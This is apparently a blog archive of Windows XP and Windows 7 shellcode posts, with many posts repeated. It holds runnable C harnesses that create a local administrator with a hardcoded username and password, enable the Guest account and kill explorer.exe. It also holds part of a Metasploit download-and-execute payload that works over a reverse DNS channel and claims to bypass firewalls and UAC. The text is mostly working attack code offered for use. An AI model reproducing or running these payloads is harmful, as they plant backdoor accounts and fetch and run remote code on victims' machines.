=====================================================
win32 generic - add new local administrator 326 bytes
=====================================================
/*
Title: generic win32 - add new local administrator 326 bytes
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Method: Dynamic opcode, encoded shellcode
Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.100427-1636 and Build 2600.080413-2111
Greetz: offsec team, inj3ct0r team, hdm
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] =
"\xda\xde\xd9\x74\x24\xf4\xb8\x22\xd2\x27\x7a\x29\xc9\xb1\x4b"
"\x5b\x31\x43\x1a\x83\xeb\xfc\x03\x43\x16\xe2\xd7\x3b\xbc\x7a"
"\x17\xbc\x95\x4b\xd7\xd8\x92\xec\xe7\xa5\x65\x94\x08\x2d\x25"
"\x69\x9d\x41\xba\xdc\x2a\xe1\xca\xf7\x25\xe2\xca\x07\xbe\xa2"
"\xfe\x8a\x80\x5e\x74\xd4\x3c\xc1\x49\xb5\xb7\x91\x69\x12\x4c"
"\x2c\x4e\xd1\x06\xaa\xd6\xe4\x4c\x3f\x6c\xff\x1b\x1a\x51\xfe"
"\xf0\x78\xa5\x49\x8d\x4b\x4d\x48\x7f\x82\xae\x7a\xbf\x19\xfc"
"\xf9\xff\x96\xfa\xc0\x30\x5b\x04\x04\x25\x90\x3d\xf6\x9d\x71"
"\x37\xe7\x56\xdb\x93\xe6\x83\xba\x50\xe4\x18\xc8\x3d\xe9\x9f"
"\x25\x4a\x15\x14\xb8\xa5\x9f\x6e\x9f\x29\xc1\xad\x72\x01\x53"
"\xd9\x27\x5d\xac\xe6\xb1\xa5\xd2\xdc\xca\xa9\xd4\xdc\x4b\x6e"
"\xd0\xdc\x4b\x71\xe0\x12\x3e\x97\xd1\x42\xd8\x57\xd6\x92\x43"
"\xa9\x5c\x9c\x0d\x8e\x83\xd3\x70\xc2\x4c\x13\x73\x1b\xc4\xf6"
"\x9b\x43\x29\x07\xa4\xfd\x17\x1c\xb9\xa0\x1a\x9f\x3a\xd4\xd4"
"\xde\x82\xee\x16\xe0\x04\x07\xa0\x1f\xfb\x28\x26\xd1\x5f\xe6"
"\x79\xbd\x0c\xf7\x2f\x39\x82\xc7\x80\xbe\xb1\xcf\xc8\xad\xc5"
"\x2f\xf7\x4e\x57\xb4\x26\xf5\xdf\x51\x17\xda\x7c\xba\x39\x41"
"\xf7\x9a\xb0\xfa\x92\xa8\x1a\x8f\x39\x2e\x2e\x06\xa6\x80\xf0"
"\xb5\x16\x8f\x9b\x65\x78\x2e\x38\x01\xa6\x96\xe6\xe9\xc8\xb3"
"\x92\xc9\x78\x53\x38\x68\xed\xcc\xcc\x05\x98\x62\x11\xb8\x06"
"\xee\x38\x54\xae\x83\xce\xda\x51\x10\x40\x68\xe1\xf8\xed\xe9"
"\x66\x8c\x78\x95\x58\x4e\x54\x34\xfd\xea\xaa";
int main(int argc, char **argv)
{
((void (*)())code)();
printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk");
return 0;
}
Showing posts with label Exploit. Show all posts
Showing posts with label Exploit. Show all posts
Tuesday, August 09, 2011
win32 generic - add new local administrator 326 bytes
win32 generic - add new local administrator 326 bytes
=====================================================
win32 generic - add new local administrator 326 bytes
=====================================================
/*
Title: generic win32 - add new local administrator 326 bytes
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Method: Dynamic opcode, encoded shellcode
Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.100427-1636 and Build 2600.080413-2111
Greetz: offsec team, inj3ct0r team, hdm
*/
=====================================================
/*
Title: generic win32 - add new local administrator 326 bytes
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Method: Dynamic opcode, encoded shellcode
Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.100427-1636 and Build 2600.080413-2111
Greetz: offsec team, inj3ct0r team, hdm
*/
#include#include #include char code[] = "\xda\xde\xd9\x74\x24\xf4\xb8\x22\xd2\x27\x7a\x29\xc9\xb1\x4b" "\x5b\x31\x43\x1a\x83\xeb\xfc\x03\x43\x16\xe2\xd7\x3b\xbc\x7a" "\x17\xbc\x95\x4b\xd7\xd8\x92\xec\xe7\xa5\x65\x94\x08\x2d\x25" "\x69\x9d\x41\xba\xdc\x2a\xe1\xca\xf7\x25\xe2\xca\x07\xbe\xa2" "\xfe\x8a\x80\x5e\x74\xd4\x3c\xc1\x49\xb5\xb7\x91\x69\x12\x4c" "\x2c\x4e\xd1\x06\xaa\xd6\xe4\x4c\x3f\x6c\xff\x1b\x1a\x51\xfe" "\xf0\x78\xa5\x49\x8d\x4b\x4d\x48\x7f\x82\xae\x7a\xbf\x19\xfc" "\xf9\xff\x96\xfa\xc0\x30\x5b\x04\x04\x25\x90\x3d\xf6\x9d\x71" "\x37\xe7\x56\xdb\x93\xe6\x83\xba\x50\xe4\x18\xc8\x3d\xe9\x9f" "\x25\x4a\x15\x14\xb8\xa5\x9f\x6e\x9f\x29\xc1\xad\x72\x01\x53" "\xd9\x27\x5d\xac\xe6\xb1\xa5\xd2\xdc\xca\xa9\xd4\xdc\x4b\x6e" "\xd0\xdc\x4b\x71\xe0\x12\x3e\x97\xd1\x42\xd8\x57\xd6\x92\x43" "\xa9\x5c\x9c\x0d\x8e\x83\xd3\x70\xc2\x4c\x13\x73\x1b\xc4\xf6" "\x9b\x43\x29\x07\xa4\xfd\x17\x1c\xb9\xa0\x1a\x9f\x3a\xd4\xd4" "\xde\x82\xee\x16\xe0\x04\x07\xa0\x1f\xfb\x28\x26\xd1\x5f\xe6" "\x79\xbd\x0c\xf7\x2f\x39\x82\xc7\x80\xbe\xb1\xcf\xc8\xad\xc5" "\x2f\xf7\x4e\x57\xb4\x26\xf5\xdf\x51\x17\xda\x7c\xba\x39\x41" "\xf7\x9a\xb0\xfa\x92\xa8\x1a\x8f\x39\x2e\x2e\x06\xa6\x80\xf0" "\xb5\x16\x8f\x9b\x65\x78\x2e\x38\x01\xa6\x96\xe6\xe9\xc8\xb3" "\x92\xc9\x78\x53\x38\x68\xed\xcc\xcc\x05\x98\x62\x11\xb8\x06" "\xee\x38\x54\xae\x83\xce\xda\x51\x10\x40\x68\xe1\xf8\xed\xe9" "\x66\x8c\x78\x95\x58\x4e\x54\x34\xfd\xea\xaa"; int main(int argc, char **argv) { ((void (*)())code)(); printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk"); return 0; }
win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
====================================================================
win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
====================================================================
/*
Title: win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Method: Hardcoded opcodes (kernel32.winexec@7c8623ad, kernel32.exitprocess@7c81cafa)
Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.080413-2111
Greetz: offsec and inj3ct0r teams
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23"
"\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca"
"\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63"
"\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"
"\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x73"
"\x65\x63\x75\x69\x64\x30\x20\x6d\x30\x6e"
"\x6b\x20\x2f\x61\x64\x64\x20\x26\x26\x20"
"\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67"
"\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e"
"\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20"
"\x73\x65\x63\x75\x69\x64\x30\x20\x2f\x61"
"\x64\x64\x00";
int main(int argc, char **argv)
{
((void (*)())code)();
printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk");
return 0;
}
win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
====================================================================
win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
====================================================================
/*
Title: win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Method: Hardcoded opcodes (kernel32.winexec@7c8623ad, kernel32.exitprocess@7c81cafa)
Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.080413-2111
Greetz: offsec and inj3ct0r teams
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23"
"\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca"
"\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63"
"\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"
"\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x73"
"\x65\x63\x75\x69\x64\x30\x20\x6d\x30\x6e"
"\x6b\x20\x2f\x61\x64\x64\x20\x26\x26\x20"
"\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67"
"\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e"
"\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20"
"\x73\x65\x63\x75\x69\x64\x30\x20\x2f\x61"
"\x64\x64\x00";
int main(int argc, char **argv)
{
((void (*)())code)();
printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk");
return 0;
}
win32/xp pro sp3 MessageBox shellcode
/*
Title: win32/xp pro sp3 MessageBox shellcode 11 bytes
Author: d3c0der - d3c0der[at]hotmail[dot]com
Tested on: WinXP Pro SP3 (EN) # ( run MessageBox that show an error message )
website : Www.AttackerZ.ir
spt : All friends ;)
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] = "\x33\xd2\x52\x52\x52\x52\xe8\xbe\xe9\x44\x7d";
int main(int argc, char **argv)
{
((void (*)())code)();
return 0;
}
win32/xp pro sp3 MessageBox shellcode
/*
Title: win32/xp pro sp3 MessageBox shellcode 11 bytes
Author: d3c0der - d3c0der[at]hotmail[dot]com
Tested on: WinXP Pro SP3 (EN) # ( run MessageBox that show an error message )
website : Www.AttackerZ.ir
spt : All friends ;)
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] = "\x33\xd2\x52\x52\x52\x52\xe8\xbe\xe9\x44\x7d";
int main(int argc, char **argv)
{
((void (*)())code)();
return 0;
}
Activate Guest Account Shellcode
#(+) Exploit Title: win32/xp sp3 Activate Guest Account Shellcode 67 Bytes
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) Category : win32-Shellcodes
#(+) Tested on : Windows Xp 32 bit
Code:
____________________________________________________________________________________________________
____________________________________________________________________________________________________
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23"
"\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca"
"\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63"
"\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"
"\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x67\x75\x65\x73\x74\x20\x2f\x61\x63\x74\x69\x76\x65\x3a\x79\x65\x73\x00";
int main(int argc, char **argv)
{
((void (*)())code)();
printf("Guest Account Activated");
return 0;
}Activate Guest Account Shellcode
#(+) Exploit Title: win32/xp sp3 Activate Guest Account Shellcode 67 Bytes
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) Category : win32-Shellcodes
#(+) Tested on : Windows Xp 32 bit
Code:
____________________________________________________________________________________________________
____________________________________________________________________________________________________
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char code[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23"
"\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca"
"\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63"
"\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"
"\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x67\x75\x65\x73\x74\x20\x2f\x61\x63\x74\x69\x76\x65\x3a\x79\x65\x73\x00";
int main(int argc, char **argv)
{
((void (*)())code)();
printf("Guest Account Activated");
return 0;
}Windows Magnifier Shellcode
#(+) Exploit Title: win32/xp sp3 Windows Magnifier Shellcode 52 bytes
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) Category : win32-Shellcodes
#(+) Tested on : Windows Xp 32 bit
Code:
____________________________________________________________________________________________________
____________________________________________________________________________________________________
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31"
"\xc0\x88\x43\x35\x53\xbb\xad\x23\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"
"\x6d\x61\x67\x6e\x69\x66\x79";
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}
Windows Magnifier Shellcode
#(+) Exploit Title: win32/xp sp3 Windows Magnifier Shellcode 52 bytes
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) Category : win32-Shellcodes
#(+) Tested on : Windows Xp 32 bit
Code:
____________________________________________________________________________________________________
____________________________________________________________________________________________________
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31"
"\xc0\x88\x43\x35\x53\xbb\xad\x23\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"
"\x6d\x61\x67\x6e\x69\x66\x79";
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}
win32/xp sp3 Force Kill explorer.exe process
#(+) Exploit Title: win32/xp sp3 Force Kill explorer.exe process Shellcode 73 Bytes
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) Category : win32-Shellcodes
#(+) Tested on : Windows Xp 32 bit
Code:
____________________________________________________________________________________________________
____________________________________________________________________________________________________
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x35\x53\xbb\xad\x23\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3"
"\xe8\xe0\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x54\x41\x53\x4b"
"\x4b\x49\x4c\x4c\x20\x2f\x46\x20\x2f\x49\x4d\x20\x65\x78\x70\x6c\x6f\x72\x65\x72\x2e\x65\x78\x65";
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}
win32/xp sp3 Force Kill explorer.exe process
#(+) Exploit Title: win32/xp sp3 Force Kill explorer.exe process Shellcode 73 Bytes
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) Category : win32-Shellcodes
#(+) Tested on : Windows Xp 32 bit
Code:
____________________________________________________________________________________________________
____________________________________________________________________________________________________
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x35\x53\xbb\xad\x23\x86\x7c"
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3"
"\xe8\xe0\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x54\x41\x53\x4b"
"\x4b\x49\x4c\x4c\x20\x2f\x46\x20\x2f\x49\x4d\x20\x65\x78\x70\x6c\x6f\x72\x65\x72\x2e\x65\x78\x65";
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}
VB6_vbaExceptHandler - SEH (calc.exe) ShellCode
# =========[ Sh31LC0d3.C ]=====>
/*
###
# Title : Win32 VB6_vbaExceptHandler - SEH (calc.exe) ShellCode - 149 Bytes
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Win32
# Target : VB6 ExE Project >*> Command : Shell ("calc.exe")
# Tested on : Windows XP SP3 France
###
*/
// TesT Project >> Compile As Name k3d4n5.exe <<
/*
004018E0 > 55 | PUSH EBP
004018E1 . 8BEC | MOV EBP,ESP
004018E3 . 83EC 0C | SUB ESP,0C
004018E6 . 68 96104000 | PUSH <JMP.&MSVBVM60.__vbaExceptHandler> ; SE handler installation (SEH)
004018EB . 64:A1 00000000 | MOV EAX,DWORD PTR FS:[0]
004018F1 . 50 | PUSH EAX
004018F2 . 64:8925 00000000 | MOV DWORD PTR FS:[0],ESP
004018F9 . 83EC 30 | SUB ESP,30
004018FC . 53 | PUSH EBX
004018FD . 56 | PUSH ESI
004018FE . 57 | PUSH EDI
004018FF . 8965 F4 | MOV DWORD PTR SS:[EBP-C],ESP
00401902 . C745 F8 80104000 | MOV DWORD PTR SS:[EBP-8],k3d4n5.00401080
00401909 . 8B45 08 | MOV EAX,DWORD PTR SS:[EBP+8]
0040190C . 8BC8 | MOV ECX,EAX
0040190E . 83E1 01 | AND ECX,1
00401911 . 894D FC | MOV DWORD PTR SS:[EBP-4],ECX
00401914 . 24 FE | AND AL,0FE
00401916 . 50 | PUSH EAX
00401917 . 8945 08 | MOV DWORD PTR SS:[EBP+8],EAX
0040191A . 8B10 | MOV EDX,DWORD PTR DS:[EAX]
0040191C . FF52 04 | CALL DWORD PTR DS:[EDX+4]
0040191F . 33F6 | XOR ESI,ESI
00401921 . 8D55 CC | LEA EDX,DWORD PTR SS:[EBP-34]
00401924 . 8975 CC | MOV DWORD PTR SS:[EBP-34],ESI
00401927 . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]
0040192A . 8975 DC | MOV DWORD PTR SS:[EBP-24],ESI
0040192D . C745 D4 616C632E657865 | MOV DWORD PTR SS:[EBP-2C], calc.exe
00401934 . C745 CC 08000000 | MOV DWORD PTR SS:[EBP-34],8
0040193B . FF15 68104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaVarDup>] ; MSVBVM60.__vbaVarDup
00401941 . 8D45 DC | LEA EAX,DWORD PTR SS:[EBP-24]
00401944 . 6A 02 | PUSH 2
00401946 . 50 | PUSH EAX
00401947 . FF15 34104000 | CALL DWORD PTR DS:[<&MSVBVM60.#600>] ; MSVBVM60.rtcShell
0040194D . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]
00401950 . DDD8 | FSTP ST
00401952 . FF15 08104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>] ; MSVBVM60.__vbaFreeVar
00401958 . 8975 FC | MOV DWORD PTR SS:[EBP-4],ESI
0040195B . 9B | WAIT
0040195C . 68 6E194000 | PUSH k3d4n5.0040196E
00401961 . EB 0A | JMP SHORT k3d4n5.0040196D
00401963 . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]
00401966 . FF15 08104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>] ; MSVBVM60.__vbaFreeVar
0040196C . C3 | RETN
*/
char SEH[] =
"\x55\x8B\xEC\x83\xEC\x0C\x68\x96\x10\x40\x00\x64\xA1\x00\x00\x00\x00\x50\x64"
"\x89\x25\x00\x00\x00\x00\x00\x40\x18\xF9\x83\xEC\x30\x53\x56\x57\x89\x65\xF4"
"\xC7\x45\xF8\x80\x10\x40\x00\x8B\x45\x08\x8B\xC8\x83\xE1\x01\x89\x4D\xFC\x24"
"\xFE\x50\x89\x45\x08\x8B\x10\xFF\x52\x04\x33\xF6\x8D\x55\xCC\x89\x75\xCC\x8D"
"\x4D\xDC\x89\x75\xDC\xC7\x45\xD4\x61\x6C\x63\x2E\x65\x78\x65\xC7\x45\xCC\x08"
"\x00\x00\x00\xFF\x15\x68\x10\x40\x00\x8D\x45\xDC\x6A\x02\x50\xFF\x15\x34\x10"
"\x00\x8D\x4D\xDC\xDD\xD8\xFF\x15\x08\x10\x40\x00\x89\x75\xFC\x9B\x68\x41\x42"
"\x43\x40\x44\xEB\x0A\x8D\x4D\xDC\xFF\x15\x08\x10\x40\x00\xC3";
int main(int argc, char **argv)
{
int (*shellcode)();
shellcode = (int (*)()) SEH;
(int)(*shellcode)();
}
/*VB6_vbaExceptHandler - SEH (calc.exe) ShellCode
# =========[ Sh31LC0d3.C ]=====>
/*
###
# Title : Win32 VB6_vbaExceptHandler - SEH (calc.exe) ShellCode - 149 Bytes
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Win32
# Target : VB6 ExE Project >*> Command : Shell ("calc.exe")
# Tested on : Windows XP SP3 France
###
*/
// TesT Project >> Compile As Name k3d4n5.exe <<
/*
004018E0 > 55 | PUSH EBP
004018E1 . 8BEC | MOV EBP,ESP
004018E3 . 83EC 0C | SUB ESP,0C
004018E6 . 68 96104000 | PUSH <JMP.&MSVBVM60.__vbaExceptHandler> ; SE handler installation (SEH)
004018EB . 64:A1 00000000 | MOV EAX,DWORD PTR FS:[0]
004018F1 . 50 | PUSH EAX
004018F2 . 64:8925 00000000 | MOV DWORD PTR FS:[0],ESP
004018F9 . 83EC 30 | SUB ESP,30
004018FC . 53 | PUSH EBX
004018FD . 56 | PUSH ESI
004018FE . 57 | PUSH EDI
004018FF . 8965 F4 | MOV DWORD PTR SS:[EBP-C],ESP
00401902 . C745 F8 80104000 | MOV DWORD PTR SS:[EBP-8],k3d4n5.00401080
00401909 . 8B45 08 | MOV EAX,DWORD PTR SS:[EBP+8]
0040190C . 8BC8 | MOV ECX,EAX
0040190E . 83E1 01 | AND ECX,1
00401911 . 894D FC | MOV DWORD PTR SS:[EBP-4],ECX
00401914 . 24 FE | AND AL,0FE
00401916 . 50 | PUSH EAX
00401917 . 8945 08 | MOV DWORD PTR SS:[EBP+8],EAX
0040191A . 8B10 | MOV EDX,DWORD PTR DS:[EAX]
0040191C . FF52 04 | CALL DWORD PTR DS:[EDX+4]
0040191F . 33F6 | XOR ESI,ESI
00401921 . 8D55 CC | LEA EDX,DWORD PTR SS:[EBP-34]
00401924 . 8975 CC | MOV DWORD PTR SS:[EBP-34],ESI
00401927 . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]
0040192A . 8975 DC | MOV DWORD PTR SS:[EBP-24],ESI
0040192D . C745 D4 616C632E657865 | MOV DWORD PTR SS:[EBP-2C], calc.exe
00401934 . C745 CC 08000000 | MOV DWORD PTR SS:[EBP-34],8
0040193B . FF15 68104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaVarDup>] ; MSVBVM60.__vbaVarDup
00401941 . 8D45 DC | LEA EAX,DWORD PTR SS:[EBP-24]
00401944 . 6A 02 | PUSH 2
00401946 . 50 | PUSH EAX
00401947 . FF15 34104000 | CALL DWORD PTR DS:[<&MSVBVM60.#600>] ; MSVBVM60.rtcShell
0040194D . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]
00401950 . DDD8 | FSTP ST
00401952 . FF15 08104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>] ; MSVBVM60.__vbaFreeVar
00401958 . 8975 FC | MOV DWORD PTR SS:[EBP-4],ESI
0040195B . 9B | WAIT
0040195C . 68 6E194000 | PUSH k3d4n5.0040196E
00401961 . EB 0A | JMP SHORT k3d4n5.0040196D
00401963 . 8D4D DC | LEA ECX,DWORD PTR SS:[EBP-24]
00401966 . FF15 08104000 | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>] ; MSVBVM60.__vbaFreeVar
0040196C . C3 | RETN
*/
char SEH[] =
"\x55\x8B\xEC\x83\xEC\x0C\x68\x96\x10\x40\x00\x64\xA1\x00\x00\x00\x00\x50\x64"
"\x89\x25\x00\x00\x00\x00\x00\x40\x18\xF9\x83\xEC\x30\x53\x56\x57\x89\x65\xF4"
"\xC7\x45\xF8\x80\x10\x40\x00\x8B\x45\x08\x8B\xC8\x83\xE1\x01\x89\x4D\xFC\x24"
"\xFE\x50\x89\x45\x08\x8B\x10\xFF\x52\x04\x33\xF6\x8D\x55\xCC\x89\x75\xCC\x8D"
"\x4D\xDC\x89\x75\xDC\xC7\x45\xD4\x61\x6C\x63\x2E\x65\x78\x65\xC7\x45\xCC\x08"
"\x00\x00\x00\xFF\x15\x68\x10\x40\x00\x8D\x45\xDC\x6A\x02\x50\xFF\x15\x34\x10"
"\x00\x8D\x4D\xDC\xDD\xD8\xFF\x15\x08\x10\x40\x00\x89\x75\xFC\x9B\x68\x41\x42"
"\x43\x40\x44\xEB\x0A\x8D\x4D\xDC\xFF\x15\x08\x10\x40\x00\xC3";
int main(int argc, char **argv)
{
int (*shellcode)();
shellcode = (int (*)()) SEH;
(int)(*shellcode)();
}
/*Monday, August 08, 2011
download & execute file via reverse DNS channel
# Shellcode: download and execute file via reverse DNS channel
#
#
# Features:
# * Windows 7 tested
# * UAC without work (svchost.exe makes requests via getaddrinfo)
# * Firewall/Router/Nat/Proxy bypass reverse connection (like dnscat do, but without sockets and stable!)
# * NO SOCKET
#
# DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip
#
#
# By Alexey Sintsov
# [DSecRG]
# a.sintsov [sobachka] dsecrg.com
# dookie [sobachka] inbox.ru
#
# P.S. Works with Vista/7/2008
# do not work in XP/2003 because thre are no IPv6 by default.
# can work in XP/2003 if IPv6 installed
# (it is not need to be enabled, just installed)
require 'msf/core'
module Metasploit3
include Msf::Payload::Windows
include Msf::Payload::Single
def initialize(info = {})
super(update_info(info,
'Name' => 'DNS_DOWNLOAD_EXEC',
'Version' => '0.01',
'Description' => 'Download and Exec (via DNS)',
'Author' => [ 'Alexey Sintsov' ],
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Payload' =>
{
'Offsets' =>{ },
'Begin' => "\xeb\x02\xeb\x7A\xe8\xf9\xff\xff\xff\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\xFF\x47\x65\x74\x54\x65\x6d\x70\x50\x61\x74\x68\x41\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x57\x69\x6E\x45\x78\x65\x63\xFF\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\xff\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\xFF\x77\x73\x32\x5f\x33\x32\xFF\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\xFF\x67\x65\x74\x61\x64\x64\x72\x69\x6e\x66\x6f\xFF\x6d\x73\x76\x63\x72\x74\xFF\x66\x6f\x70\x65\x6e\xFF\x66\x77\x72\x69\x74\x65\xFF\xEB\x13\x66\x63\x6c\x6f\x73\x65\xFF",
'Payload1' => "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF\x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e\x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4\xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57\x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24\x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8",
